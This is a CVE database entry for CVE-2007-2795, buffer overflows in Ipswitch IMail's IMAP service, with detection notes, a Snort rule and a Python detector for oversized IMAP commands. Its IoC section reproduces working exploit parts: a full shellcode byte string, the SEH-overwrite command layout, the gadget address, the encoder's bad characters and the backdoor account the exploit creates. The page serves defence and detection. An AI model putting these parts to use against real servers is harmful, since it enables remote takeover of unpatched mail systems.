cbcvebase.
CVE-2007-2795
published 2009-01-27

Priority: P2 60
Severity: critical, 9 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
EXPLOIT: available
EPSS: 24.45% (97.6th percentile)
Multiple buffer overflows in Ipswitch IMail before 2006.21 allow remote attackers or authenticated users to execute arbitrary code via (1) the authentication feature in IMailsec.dll, which triggers heap corruption in the IMail Server, or (2) a long SUBSCRIBE IMAP command, which triggers a stack-based buffer overflow in the IMAP Daemon.

Affected (2 ranges)

Vendor   | Product | Version range | Fixed in
ipswitch | imail   | <= 2006.2     |
ipswitch | imail   |               |

Detection & IOCs (extracted from sources)

port: 143
command: 2 SEARCH BEFORE <80x NOP><nextseh><seh><100x NOP><shellcode><300x NOP>
bytes:
\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53
bytes: \xC4\x2A\x02\x75
bytes: \xeb\x10\x90\x90
snort: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
  • The exploit uses a SEARCH BEFORE IMAP command (not SUBSCRIBE) with a malformed argument to trigger the stack-based buffer overflow; monitor for oversized IMAP SEARCH BEFORE arguments on port 143.
  • The SEH overwrite uses the pop/pop/ret gadget at 0x75022AC4 in ws2help.dll on Windows 2000 SP4; presence of this address in network traffic or crash dumps is a strong indicator of exploitation.
  • Successful exploitation creates a local admin account; hunt for new local accounts named 'r00t' with password 'r00tr00t!!' as a post-exploitation indicator.
  • The Snort rule detects LOGIN commands followed by 100+ characters on IMAP port 143; the PCRE pattern /\sLOGIN\s[^\n]{100}/smi covers both the LOGIN heap overflow and similar oversized IMAP auth attempts.
  • Bad characters for the shellcode encoder are null byte, LF, CR, vertical tab, tab, form feed, and space — useful for crafting detection signatures that look for shellcode bypassing these bytes.
  • The exploit was tested only on Windows 2000 SP4; the SEH gadget address (0x75022AC4 in ws2help.dll) is OS/patch-level specific and will differ on other platforms.
  • The vulnerability affects Ipswitch IMail before version 2006.21; the exploit targets IMAP Server 9.20 specifically.
  • The Snort rule (sid:2101842) covers multiple CVEs beyond CVE-2007-2795 (including CVE-1999-0005, CVE-1999-1557, CVE-2005-1255); tune alerting context accordingly to avoid false attribution.
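The detection points above (oversized LOGIN arguments as in the Snort PCRE, oversized SEARCH BEFORE arguments, and the ws2help.dll gadget address bytes as an IoC) can be applied to client-to-server IMAP lines pulled from a capture or proxy log. The following is an added example written for this page, not code from the CVE entry or its sources; the SEARCH BEFORE length threshold, the alert labels and the sample lines are constructed for illustration.

```python
"""Classify client-to-server IMAP command lines against the patterns
described for CVE-2007-2795. Added example: thresholds, labels and sample
traffic below are constructed, not taken from a real capture."""
import re
from typing import List, Optional, Tuple

# Same pattern as the Snort rule's pcre: LOGIN followed by 100+ non-newline bytes.
LOGIN_OVERFLOW = re.compile(rb"\sLOGIN\s[^\n]{100}", re.I | re.S)

# Argument of a SEARCH BEFORE command; RFC 3501 expects a short date there.
SEARCH_BEFORE = re.compile(rb"\sSEARCH\s+BEFORE\s+(\S+)", re.I)
MAX_SEARCH_BEFORE_ARG = 32   # assumed tuning threshold; a date is about 11 bytes

# Little-endian encoding of 0x75022AC4, the ws2help.dll address listed above.
SEH_GADGET = bytes.fromhex("C42A0275")


def classify_imap_line(line: bytes) -> Optional[str]:
    """Return an alert label for one IMAP command line, or None if benign."""
    if LOGIN_OVERFLOW.search(line):
        return "imap-login-overflow"
    m = SEARCH_BEFORE.search(line)
    if m and len(m.group(1)) > MAX_SEARCH_BEFORE_ARG:
        return "imap-search-before-oversized"
    if SEH_GADGET in line:
        return "imap-seh-gadget-bytes"
    return None


def scan_capture(lines: List[bytes]) -> List[Tuple[int, str]]:
    """Return (1-based line number, label) for every flagged line."""
    return [(i, label) for i, line in enumerate(lines, 1)
            if (label := classify_imap_line(line))]


# Constructed sample traffic: two benign lines, then three that should alert.
SAMPLE_LINES = [
    b"a001 LOGIN alice s3cret\r\n",
    b"a002 SEARCH BEFORE 1-Feb-2007\r\n",
    b"a003 LOGIN " + b"A" * 150 + b" pw\r\n",
    b"a004 SEARCH BEFORE " + b"B" * 200 + b"\r\n",
    b"a005 NOOP " + SEH_GADGET + b"\r\n",
]

if __name__ == "__main__":
    for lineno, label in scan_capture(SAMPLE_LINES):
        print(f"line {lineno}: {label}")
```

The LOGIN check is deliberately the same expression as the Snort rule so that alerts from both sources line up; the SEARCH BEFORE threshold is the one value you would tune for your environment, since legitimate clients never send more than a date there.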